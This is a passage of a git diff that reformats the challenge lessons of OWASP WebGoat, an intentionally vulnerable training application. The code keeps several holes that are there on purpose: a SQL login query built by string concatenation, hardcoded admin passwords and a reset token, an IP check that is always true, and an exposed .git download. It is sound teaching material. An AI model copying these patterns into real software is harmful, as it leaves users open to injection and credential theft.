+  private LocalDateTime time;
+  private String contents;
+  private String sender;
+  private String title;
+  private String recipient;
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java b/src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java
index fdeb5a85a..d78186585 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java
@@ -22,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.challenges;
 
+import java.util.HashMap;
+import java.util.Map;
+import java.util.UUID;
+import java.util.stream.IntStream;
+import javax.annotation.PostConstruct;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -37,12 +42,6 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.annotation.PostConstruct;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.UUID;
-import java.util.stream.IntStream;
-
 /**
  * @author nbaars
  * @since 3/23/17.
@@ -50,39 +49,41 @@ import java.util.stream.IntStream;
 @RestController
 public class Flag extends AssignmentEndpoint {
 
-    public static final Map<Integer, String> FLAGS = new HashMap<>();
-    @Autowired
-    private UserTrackerRepository userTrackerRepository;
-    @Autowired
-    private WebSession webSession;
+  public static final Map<Integer, String> FLAGS = new HashMap<>();
+  @Autowired private UserTrackerRepository userTrackerRepository;
+  @Autowired private WebSession webSession;
 
-    @AllArgsConstructor
-    private class FlagPosted {
-        @Getter
-        private boolean lessonCompleted;
-    }
+  @AllArgsConstructor
+  private class FlagPosted {
+    @Getter private boolean lessonCompleted;
+  }
 
-    @PostConstruct
-    public void initFlags() {
-        IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
-    }
+  @PostConstruct
+  public void initFlags() {
+    IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
+  }
 
-    @RequestMapping(path = "/challenge/flag", method = RequestMethod.POST, produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult postFlag(@RequestParam String flag) {
-        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
-        String currentChallenge = webSession.getCurrentLesson().getName();
-        int challengeNumber = Integer.valueOf(currentChallenge.substring(currentChallenge.length() - 1, currentChallenge.length()));
-        String expectedFlag = FLAGS.get(challengeNumber);
-        final AttackResult attackResult;
-        if (expectedFlag.equals(flag)) {
-            userTracker.assignmentSolved(webSession.getCurrentLesson(), "Assignment" + challengeNumber);
-            attackResult = success(this).feedback("challenge.flag.correct").build();
-        } else {
-            userTracker.assignmentFailed(webSession.getCurrentLesson());
-            attackResult = failed(this).feedback("challenge.flag.incorrect").build();
-        }
-        userTrackerRepository.save(userTracker);
-        return attackResult;
+  @RequestMapping(
+      path = "/challenge/flag",
+      method = RequestMethod.POST,
+      produces = MediaType.APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult postFlag(@RequestParam String flag) {
+    UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+    String currentChallenge = webSession.getCurrentLesson().getName();
+    int challengeNumber =
+        Integer.valueOf(
+            currentChallenge.substring(currentChallenge.length() - 1, currentChallenge.length()));
+    String expectedFlag = FLAGS.get(challengeNumber);
+    final AttackResult attackResult;
+    if (expectedFlag.equals(flag)) {
+      userTracker.assignmentSolved(webSession.getCurrentLesson(), "Assignment" + challengeNumber);
+      attackResult = success(this).feedback("challenge.flag.correct").build();
+    } else {
+      userTracker.assignmentFailed(webSession.getCurrentLesson());
+      attackResult = failed(this).feedback("challenge.flag.incorrect").build();
     }
+    userTrackerRepository.save(userTracker);
+    return attackResult;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java b/src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java
index c2ca6d849..890d80d06 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java
@@ -30,8 +30,8 @@ package org.owasp.webgoat.lessons.challenges;
  */
 public interface SolutionConstants {
 
-    //TODO should be random generated when starting the server
-    String PASSWORD = "!!webgoat_admin_1234!!";
-    String PASSWORD_TOM = "thisisasecretfortomonly";
-    String ADMIN_PASSWORD_LINK = "375afe1104f4a487a73823c50a9292a2";
+  // TODO should be random generated when starting the server
+  String PASSWORD = "!!webgoat_admin_1234!!";
+  String PASSWORD_TOM = "thisisasecretfortomonly";
+  String ADMIN_PASSWORD_LINK = "375afe1104f4a487a73823c50a9292a2";
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java
index 62a865f63..0d07c7427 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.lessons.challenges.challenge1;
 
+import static org.owasp.webgoat.lessons.challenges.SolutionConstants.PASSWORD;
+
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.lessons.challenges.Flag;
@@ -9,33 +12,30 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-
-import static org.owasp.webgoat.lessons.challenges.SolutionConstants.PASSWORD;
-
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -45,20 +45,25 @@ import static org.owasp.webgoat.lessons.challenges.SolutionConstants.PASSWORD;
 @RestController
 public class Assignment1 extends AssignmentEndpoint {
 
-    @PostMapping("/challenge/1")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String username, @RequestParam String password, HttpServletRequest request) {
-        boolean ipAddressKnown =  true;
-        boolean passwordCorrect = "admin".equals(username) && PASSWORD.replace("1234", String.format("%04d",ImageServlet.PINCODE)).equals(password);
-        if (passwordCorrect && ipAddressKnown) {
-            return success(this).feedback("challenge.solved").feedbackArgs(Flag.FLAGS.get(1)).build();
-        } else if (passwordCorrect) {
-            return failed(this).feedback("ip.address.unknown").build();
-        }
-        return failed(this).build();
+  @PostMapping("/challenge/1")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String username, @RequestParam String password, HttpServletRequest request) {
+    boolean ipAddressKnown = true;
+    boolean passwordCorrect =
+        "admin".equals(username)
+            && PASSWORD
+                .replace("1234", String.format("%04d", ImageServlet.PINCODE))
+                .equals(password);
+    if (passwordCorrect && ipAddressKnown) {
+      return success(this).feedback("challenge.solved").feedbackArgs(Flag.FLAGS.get(1)).build();
+    } else if (passwordCorrect) {
+      return failed(this).feedback("ip.address.unknown").build();
     }
+    return failed(this).build();
+  }
 
-    public static boolean containsHeader(HttpServletRequest request) {
-        return StringUtils.hasText(request.getHeader("X-Forwarded-For"));
-    }
+  public static boolean containsHeader(HttpServletRequest request) {
+    return StringUtils.hasText(request.getHeader("X-Forwarded-For"));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java
index 940568113..fa9129040 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java
@@ -11,13 +11,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class Challenge1 extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CHALLENGE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CHALLENGE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "challenge1.title";
-    }
+  @Override
+  public String getTitle() {
+    return "challenge1.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java
index 925ddfd4d..1de00e012 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java
@@ -1,36 +1,41 @@
 package org.owasp.webgoat.lessons.challenges.challenge1;
 
+import static org.springframework.web.bind.annotation.RequestMethod.GET;
+import static org.springframework.web.bind.annotation.RequestMethod.POST;
+
+import java.io.IOException;
+import java.security.SecureRandom;
+import javax.servlet.http.HttpServlet;
 import org.springframework.core.io.ClassPathResource;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServlet;
-import java.io.IOException;
-import java.security.SecureRandom;
-
-import static org.springframework.web.bind.annotation.RequestMethod.GET;
-import static org.springframework.web.bind.annotation.RequestMethod.POST;
-
 @RestController
 public class ImageServlet extends HttpServlet {
-	
-	private static final long serialVersionUID = 9132775506936676850L;
-	static final public int PINCODE = new SecureRandom().nextInt(10000);
 
-    @RequestMapping(method = {GET, POST}, value = "/challenge/logo", produces = MediaType.IMAGE_PNG_VALUE)
-    @ResponseBody
-	public byte[] logo() throws IOException {
-		byte[] in = new ClassPathResource("lessons/challenges/images/webgoat2.png").getInputStream().readAllBytes();
-		
-		String pincode = String.format("%04d", PINCODE);
-		
-		in[81216]=(byte) pincode.charAt(0);
-		in[81217]=(byte) pincode.charAt(1);
-		in[81218]=(byte) pincode.charAt(2);
-		in[81219]=(byte) pincode.charAt(3);
+  private static final long serialVersionUID = 9132775506936676850L;
+  public static final int PINCODE = new SecureRandom().nextInt(10000);
 
-        return in;
-	}
+  @RequestMapping(
+      method = {GET, POST},
+      value = "/challenge/logo",
+      produces = MediaType.IMAGE_PNG_VALUE)
+  @ResponseBody
+  public byte[] logo() throws IOException {
+    byte[] in =
+        new ClassPathResource("lessons/challenges/images/webgoat2.png")
+            .getInputStream()
+            .readAllBytes();
+
+    String pincode = String.format("%04d", PINCODE);
+
+    in[81216] = (byte) pincode.charAt(0);
+    in[81217] = (byte) pincode.charAt(1);
+    in[81218] = (byte) pincode.charAt(2);
+    in[81219] = (byte) pincode.charAt(3);
+
+    return in;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java
index 48d6f85d2..d6b8dcceb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java
@@ -22,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.challenges.challenge5;
 
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -33,38 +35,41 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-
 @RestController
 @Slf4j
 public class Assignment5 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public Assignment5(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
+  public Assignment5(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
+
+  @PostMapping("/challenge/5")
+  @ResponseBody
+  public AttackResult login(
+      @RequestParam String username_login, @RequestParam String password_login) throws Exception {
+    if (!StringUtils.hasText(username_login) || !StringUtils.hasText(password_login)) {
+      return failed(this).feedback("required4").build();
     }
-
-    @PostMapping("/challenge/5")
-    @ResponseBody
-    public AttackResult login(@RequestParam String username_login, @RequestParam String password_login) throws Exception {
-        if (!StringUtils.hasText(username_login) || !StringUtils.hasText(password_login)) {
-            return failed(this).feedback("required4").build();
-        }
-        if (!"Larry".equals(username_login)) {
-            return failed(this).feedback("user.not.larry").feedbackArgs(username_login).build();
-        }
-        try (var connection = dataSource.getConnection()) {
-            PreparedStatement statement = connection.prepareStatement("select password from challenge_users where userid = '" + username_login + "' and password = '" + password_login + "'");
-            ResultSet resultSet = statement.executeQuery();
-
-            if (resultSet.next()) {
-                return success(this).feedback("challenge.solved").feedbackArgs(Flag.FLAGS.get(5)).build();
-            } else {
-                return failed(this).feedback("challenge.close").build();
-            }
-        }
+    if (!"Larry".equals(username_login)) {
+      return failed(this).feedback("user.not.larry").feedbackArgs(username_login).build();
     }
+    try (var connection = dataSource.getConnection()) {
+      PreparedStatement statement =
+          connection.prepareStatement(
+              "select password from challenge_users where userid = '"
+                  + username_login
+                  + "' and password = '"
+                  + password_login
+                  + "'");
+      ResultSet resultSet = statement.executeQuery();
+
+      if (resultSet.next()) {
+        return success(this).feedback("challenge.solved").feedbackArgs(Flag.FLAGS.get(5)).build();
+      } else {
+        return failed(this).feedback("challenge.close").build();
+      }
+    }
+  }
 }
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java
index 6f17215c2..7fe4cfa9c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java
@@ -33,13 +33,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class Challenge5 extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CHALLENGE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CHALLENGE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "challenge5.title";
-    }
+  @Override
+  public String getTitle() {
+    return "challenge5.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java
index fab634c08..30e17288c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java
@@ -1,11 +1,15 @@
 package org.owasp.webgoat.lessons.challenges.challenge7;
 
+import java.net.URI;
+import java.net.URISyntaxException;
+import java.time.LocalDateTime;
+import javax.servlet.http.HttpServletRequest;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.lessons.challenges.Email;
-import org.owasp.webgoat.lessons.challenges.SolutionConstants;
 import org.owasp.webgoat.lessons.challenges.Flag;
+import org.owasp.webgoat.lessons.challenges.SolutionConstants;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.core.io.ClassPathResource;
@@ -21,11 +25,6 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.client.RestTemplate;
 
-import javax.servlet.http.HttpServletRequest;
-import java.net.URI;
-import java.net.URISyntaxException;
-import java.time.LocalDateTime;
-
 /**
  * @author nbaars
  * @since 4/8/17.
@@ -34,53 +33,67 @@ import java.time.LocalDateTime;
 @Slf4j
 public class Assignment7 extends AssignmentEndpoint {
 
-    private static final String TEMPLATE = "Hi, you requested a password reset link, please use this "
-            + "<a target='_blank' href='%s:8080/WebGoat/challenge/7/reset-password/%s'>link</a> to reset your password."
-            + "\n \n\n"
-            + "If you did not request this password change you can ignore this message."
-            + "\n"
-            + "If you have any comments or questions, please do not hesitate to reach us at support@webgoat-cloud.org"
-            + "\n\n"
-            + "Kind regards, \nTeam WebGoat";
+  private static final String TEMPLATE =
+      "Hi, you requested a password reset link, please use this <a target='_blank'"
+          + " href='%s:8080/WebGoat/challenge/7/reset-password/%s'>link</a> to reset your"
+          + " password.\n"
+          + " \n\n"
+          + "If you did not request this password change you can ignore this message.\n"
+          + "If you have any comments or questions, please do not hesitate to reach us at"
+          + " support@webgoat-cloud.org\n\n"
+          + "Kind regards, \n"
+          + "Team WebGoat";
 
-    @Autowired
-    private RestTemplate restTemplate;
-    @Value("${webwolf.mail.url}")
-    private String webWolfMailURL;
+  @Autowired private RestTemplate restTemplate;
 
-    @GetMapping("/challenge/7/reset-password/{link}")
-    public ResponseEntity<String> resetPassword(@PathVariable(value = "link") String link) {
-        if (link.equals(SolutionConstants.ADMIN_PASSWORD_LINK)) {
-            return ResponseEntity.accepted().body("<h1>Success!!</h1>"
-                    + "<img src='/WebGoat/images/hi-five-cat.jpg'>"
-                    + "<br/><br/>Here is your flag: " + "<b>" + Flag.FLAGS.get(7) + "</b>");
-        }
-        return ResponseEntity.status(HttpStatus.I_AM_A_TEAPOT).body("That is not the reset link for admin");
+  @Value("${webwolf.mail.url}")
+  private String webWolfMailURL;
+
+  @GetMapping("/challenge/7/reset-password/{link}")
+  public ResponseEntity<String> resetPassword(@PathVariable(value = "link") String link) {
+    if (link.equals(SolutionConstants.ADMIN_PASSWORD_LINK)) {
+      return ResponseEntity.accepted()
+          .body(
+              "<h1>Success!!</h1>"
+                  + "<img src='/WebGoat/images/hi-five-cat.jpg'>"
+                  + "<br/><br/>Here is your flag: "
+                  + "<b>"
+                  + Flag.FLAGS.get(7)
+                  + "</b>");
     }
+    return ResponseEntity.status(HttpStatus.I_AM_A_TEAPOT)
+        .body("That is not the reset link for admin");
+  }
 
-    @PostMapping("/challenge/7")
-    @ResponseBody
-    public AttackResult sendPasswordResetLink(@RequestParam String email, HttpServletRequest request) throws URISyntaxException {
-        if (StringUtils.hasText(email)) {
-            String username = email.substring(0, email.indexOf("@"));
-            if (StringUtils.hasText(username)) {
-                URI uri = new URI(request.getRequestURL().toString());
-                Email mail = Email.builder()
-                        .title("Your password reset link for challenge 7")
-                        .contents(String.format(TEMPLATE, uri.getScheme() + "://" + uri.getHost(), new PasswordResetLink().createPasswordReset(username, "webgoat")))
-                        .sender("password-reset@webgoat-cloud.net")
-                        .recipient(username)
-                        .time(LocalDateTime.now()).build();
-                restTemplate.postForEntity(webWolfMailURL, mail, Object.class);
-            }
-        }
-        return success(this).feedback("email.send").feedbackArgs(email).build();
+  @PostMapping("/challenge/7")
+  @ResponseBody
+  public AttackResult sendPasswordResetLink(@RequestParam String email, HttpServletRequest request)
+      throws URISyntaxException {
+    if (StringUtils.hasText(email)) {
+      String username = email.substring(0, email.indexOf("@"));
+      if (StringUtils.hasText(username)) {
+        URI uri = new URI(request.getRequestURL().toString());
+        Email mail =
+            Email.builder()
+                .title("Your password reset link for challenge 7")
+                .contents(
+                    String.format(
+                        TEMPLATE,
+                        uri.getScheme() + "://" + uri.getHost(),
+                        new PasswordResetLink().createPasswordReset(username, "webgoat")))
+                .sender("password-reset@webgoat-cloud.net")
+                .recipient(username)
+                .time(LocalDateTime.now())
+                .build();
+        restTemplate.postForEntity(webWolfMailURL, mail, Object.class);
+      }
     }
+    return success(this).feedback("email.send").feedbackArgs(email).build();
+  }
 
-    @GetMapping(value = "/challenge/7/.git", produces = MediaType.APPLICATION_OCTET_STREAM_VALUE)
-    @ResponseBody
-    public ClassPathResource git() {
-        return new ClassPathResource("challenge7/git.zip");
-    }
+  @GetMapping(value = "/challenge/7/.git", produces = MediaType.APPLICATION_OCTET_STREAM_VALUE)
+  @ResponseBody
+  public ClassPathResource git() {
+    return new ClassPathResource("challenge7/git.zip");
+  }
 }
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java
index df621ac17..ee14c8325 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java
@@ -11,13 +11,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class Challenge7 extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CHALLENGE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CHALLENGE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "challenge7.title";
-    }
+  @Override
+  public String getTitle() {
+    return "challenge7.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
index 7b502c887..d523b6ba9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
@@ -7,21 +7,17 @@ import java.io.InputStream;
 import java.io.UnsupportedEncodingException;
 
 /**
- * MD5 hash generator.
- * More information about this class is available from <a target="_top" href=
+ * MD5 hash generator. More information about this class is available from <a target="_top" href=
  * "http://ostermiller.org/utils/MD5.html">ostermiller.org</a>.
- * <p>
- * This class takes as input a message of arbitrary length and produces
- * as output a 128-bit "fingerprint" or "message digest" of the input.
- * It is conjectured that it is computationally infeasible to produce
- * two messages having the same message digest, or to produce any
- * message having a given pre-specified target message digest. The MD5
- * algorithm is intended for digital signature applications, where a
- * large file must be "compressed" in a secure manner before being
- * encrypted with a private (secret) key under a public-key cryptosystem
- * such as RSA.
- * <p>
- * For more information see RFC1321.
+ *
+ * <p>This class takes as input a message of arbitrary length and produces as output a 128-bit
+ * "fingerprint" or "message digest" of the input. It is conjectured that it is computationally
+ * infeasible to produce two messages having the same message digest, or to produce any message
+ * having a given pre-specified target message digest. The MD5 algorithm is intended for digital
+ * signature applications, where a large file must be "compressed" in a secure manner before being
+ * encrypted with a private (secret) key under a public-key cryptosystem such as RSA.
+ *
+ * <p>For more information see RFC1321.
  *
  * @author Santeri Paavolainen http://santtu.iki.fi/md5/
  * @author Stephen Ostermiller http://ostermiller.org/contact.pl?regarding=Java+Utilities
@@ -29,662 +25,701 @@ import java.io.UnsupportedEncodingException;
  */
 public class MD5 {
 
-    /**
-     * Class constructor
-     *
-     * @since ostermillerutils 1.00.00
-     */
-    public MD5() {
-        reset();
-    }
+  /**
+   * Class constructor
+   *
+   * @since ostermillerutils 1.00.00
+   */
+  public MD5() {
+    reset();
+  }
 
-    /**
-     * Command line program that will take files as arguments
-     * and output the MD5 sum for each file.
-     *
-     * @param args command line arguments
-     * @since ostermillerutils 1.00.00
-     */
-    public static void main(String[] args) {
-        if (args.length == 0) {
-            System.err.println("Please specify a file.");
-        } else {
-            for (String element : args) {
-                try {
-                    System.out.println(MD5.getHashString(new File(element)) + " " + element);
-                } catch (IOException x) {
-                    System.err.println(x.getMessage());
-                }
-            }
+  /**
+   * Command line program that will take files as arguments and output the MD5 sum for each file.
+   *
+   * @param args command line arguments
+   * @since ostermillerutils 1.00.00
+   */
+  public static void main(String[] args) {
+    if (args.length == 0) {
+      System.err.println("Please specify a file.");
+    } else {
+      for (String element : args) {
+        try {
+          System.out.println(MD5.getHashString(new File(element)) + " " + element);
+        } catch (IOException x) {
+          System.err.println(x.getMessage());
         }
+      }
+    }
+  }
+
+  /**
+   * Gets this hash sum as an array of 16 bytes.
+   *
+   * @return Array of 16 bytes, the hash of all updated bytes.
+   * @since ostermillerutils 1.00.00
+   */
+  public byte[] getHash() {
+    if (!finalState.valid) {
+      finalState.copy(workingState);
+      long bitCount = finalState.bitCount;
+      // Compute the number of left over bits
+      int leftOver = (int) (((bitCount >>> 3)) & 0x3f);
+      // Compute the amount of padding to add based on number of left over bits.
+      int padlen = (leftOver < 56) ? (56 - leftOver) : (120 - leftOver);
+      // add the padding
+      update(finalState, padding, 0, padlen);
+      // add the length (computed before padding was added)
+      update(finalState, encode(bitCount), 0, 8);
+      finalState.valid = true;
+    }
+    // make a copy of the hash before returning it.
+    return encode(finalState.state, 16);
+  }
+
+  /**
+   * Returns 32-character hex representation of this hash.
+   *
+   * @return String representation of this object's hash.
+   * @since ostermillerutils 1.00.00
+   */
+  public String getHashString() {
+    return toHex(this.getHash());
+  }
+
+  /**
+   * Gets the MD5 hash of the given byte array.
+   *
+   * @param b byte array for which an MD5 hash is desired.
+   * @return Array of 16 bytes, the hash of all updated bytes.
+   * @since ostermillerutils 1.00.00
+   */
+  public static byte[] getHash(byte[] b) {
+    MD5 md5 = new MD5();
+    md5.update(b);
+    return md5.getHash();
+  }
+
+  /**
+   * Gets the MD5 hash of the given byte array.
+   *
+   * @param b byte array for which an MD5 hash is desired.
+   * @return 32-character hex representation the data's MD5 hash.
+   * @since ostermillerutils 1.00.00
+   */
+  public static String getHashString(byte[] b) {
+    MD5 md5 = new MD5();
+    md5.update(b);
+    return md5.getHashString();
+  }
+
+  /**
+   * Gets the MD5 hash the data on the given InputStream.
+   *
+   * @param in byte array for which an MD5 hash is desired.
+   * @return Array of 16 bytes, the hash of all updated bytes.
+   * @throws IOException if an I/O error occurs.
+   * @since ostermillerutils 1.00.00
+   */
+  public static byte[] getHash(InputStream in) throws IOException {
+    MD5 md5 = new MD5();
+    byte[] buffer = new byte[1024];
+    int read;
+    while ((read = in.read(buffer)) != -1) {
+      md5.update(buffer, read);
+    }
+    return md5.getHash();
+  }
+
+  /**
+   * Gets the MD5 hash the data on the given InputStream.
+   *
+   * @param in byte array for which an MD5 hash is desired.
+   * @return 32-character hex representation the data's MD5 hash.
+   * @throws IOException if an I/O error occurs.
+   * @since ostermillerutils 1.00.00
+   */
+  public static String getHashString(InputStream in) throws IOException {
+    MD5 md5 = new MD5();
+    byte[] buffer = new byte[1024];
+    int read;
+    while ((read = in.read(buffer)) != -1) {
+      md5.update(buffer, read);
+    }
+    return md5.getHashString();
+  }
+
+  /**
+   * Gets the MD5 hash of the given file.
+   *
+   * @param f file for which an MD5 hash is desired.
+   * @return Array of 16 bytes, the hash of all updated bytes.
+   * @throws IOException if an I/O error occurs.
+   * @since ostermillerutils 1.00.00
+   */
+  public static byte[] getHash(File f) throws IOException {
+    byte[] hash = null;
+    try (InputStream is = new FileInputStream(f)) {
+      hash = getHash(is);
+    }
+    return hash;
+  }
+
+  /**
+   * Gets the MD5 hash of the given file.
+   *
+   * @param f file array for which an MD5 hash is desired.
+   * @return 32-character hex representation the data's MD5 hash.
+   * @throws IOException if an I/O error occurs.
+   * @since ostermillerutils 1.00.00
+   */
+  public static String getHashString(File f) throws IOException {
+    String hash = null;
+    try (InputStream is = new FileInputStream(f)) {
+      hash = getHashString(is);
+    }
+    return hash;
+  }
+
+  /**
+   * Gets the MD5 hash of the given String. The string is converted to bytes using the current
+   * platform's default character encoding.
+   *
+   * @param s String for which an MD5 hash is desired.
+   * @return Array of 16 bytes, the hash of all updated bytes.
+   * @since ostermillerutils 1.00.00
+   */
+  public static byte[] getHash(String s) {
+    MD5 md5 = new MD5();
+    md5.update(s);
+    return md5.getHash();
+  }
+
+  /**
+   * Gets the MD5 hash of the given String. The string is converted to bytes using the current
+   * platform's default character encoding.
+   *
+   * @param s String for which an MD5 hash is desired.
+   * @return 32-character hex representation the data's MD5 hash.
+   * @since ostermillerutils 1.00.00
+   */
+  public static String getHashString(String s) {
+    MD5 md5 = new MD5();
+    md5.update(s);
+    return md5.getHashString();
+  }
+
+  /**
+   * Gets the MD5 hash of the given String.
+   *
+   * @param s String for which an MD5 hash is desired.
+   * @param enc The name of a supported character encoding.
+   * @return Array of 16 bytes, the hash of all updated bytes.
+   * @throws UnsupportedEncodingException If the named encoding is not supported.
+   * @since ostermillerutils 1.00.00
+   */
+  public static byte[] getHash(String s, String enc) throws UnsupportedEncodingException {
+    MD5 md5 = new MD5();
+    md5.update(s, enc);
+    return md5.getHash();
+  }
+
+  /**
+   * Gets the MD5 hash of the given String.
+   *
+   * @param s String for which an MD5 hash is desired.
+   * @param enc The name of a supported character encoding.
+   * @return 32-character hex representation the data's MD5 hash.
+   * @throws UnsupportedEncodingException If the named encoding is not supported.
+   * @since ostermillerutils 1.00.00
+   */
+  public static String getHashString(String s, String enc) throws UnsupportedEncodingException {
